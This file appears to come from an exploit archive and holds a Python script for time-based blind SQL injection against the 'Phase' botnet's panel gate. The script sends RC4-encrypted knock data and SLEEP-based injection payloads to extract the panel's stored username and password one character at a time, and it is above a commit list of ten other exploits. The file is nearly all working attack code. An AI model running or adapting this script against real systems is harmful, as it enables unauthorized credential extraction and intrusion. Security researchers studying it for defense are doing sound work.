f564ddfd17
10 changes to exploits/shellcodes LanSend 3.2 - Buffer Overflow (SEH) MacOS 320.whatis Script - Privilege Escalation Phase Botnet - Blind SQL Injection Orchard Core RC1 - Persistent Cross-Site Scripting ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection CuteNews 2.1.2 - Authenticated Arbitrary File Upload Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting qdPM 9.1 - Arbitrary File Upload TylerTech Eagle 2018.3.11 - Remote Code Execution
82 lines
No EOL
2.1 KiB
Python
Executable file
82 lines
No EOL
2.1 KiB
Python
Executable file
import requests
|
|
import time
|
|
import sys
|
|
|
|
wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number
|
|
KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification
|
|
|
|
PostData = ""
|
|
|
|
def rc4_crypt(data , key):
|
|
S = list(range(256))
|
|
j = 0
|
|
out = []
|
|
|
|
for i in range(256):
|
|
j = (j + S[i] + ord( key[i % len(key)] )) % 256
|
|
S[i] , S[j] = S[j] , S[i]
|
|
|
|
i = j = 0
|
|
for char in data:
|
|
i = ( i + 1 ) % 256
|
|
j = ( j + S[i] ) % 256
|
|
S[i] , S[j] = S[j] , S[i]
|
|
out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
|
|
return ''.join(out)
|
|
|
|
def brute_length(url, id):
|
|
for i in range(0, 30):
|
|
Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay)
|
|
ConnectUrl = url + '?i=' + Injection
|
|
|
|
start = time.time()
|
|
r = requests.post(ConnectUrl, data=PostData, headers='')
|
|
end = time.time()
|
|
|
|
if((end - start) >= wait_delay):
|
|
return i
|
|
|
|
return 0
|
|
|
|
def brute_char(url, position, id):
|
|
sys.stdout.write(" ")
|
|
sys.stdout.flush()
|
|
|
|
for i in range(32, 127):
|
|
Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay)
|
|
ConnectUrl = url + '?i=' + Injection
|
|
|
|
sys.stdout.write("\b%c" % chr(i))
|
|
sys.stdout.flush()
|
|
|
|
start = time.time()
|
|
r = requests.post(ConnectUrl, data=PostData, headers='')
|
|
end = time.time()
|
|
|
|
if((end - start) >= wait_delay):
|
|
break
|
|
|
|
def brute_panel(url):
|
|
global KnockString, PostData
|
|
|
|
PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa')
|
|
|
|
print"Username: ",;
|
|
sys.stdout.flush()
|
|
ulen = brute_length(url, 1)
|
|
|
|
for i in range(1, ulen+1):
|
|
brute_char(url, i, 1)
|
|
|
|
print"\nPassword: ",
|
|
sys.stdout.flush()
|
|
plen = brute_length(url, 2)
|
|
|
|
for i in range(1, plen+1):
|
|
brute_char(url, i, 2)
|
|
print""
|
|
|
|
if(len(sys.argv) >= 2):
|
|
brute_panel(sys.argv[1])
|
|
else:
|
|
print("enter panel gate url") |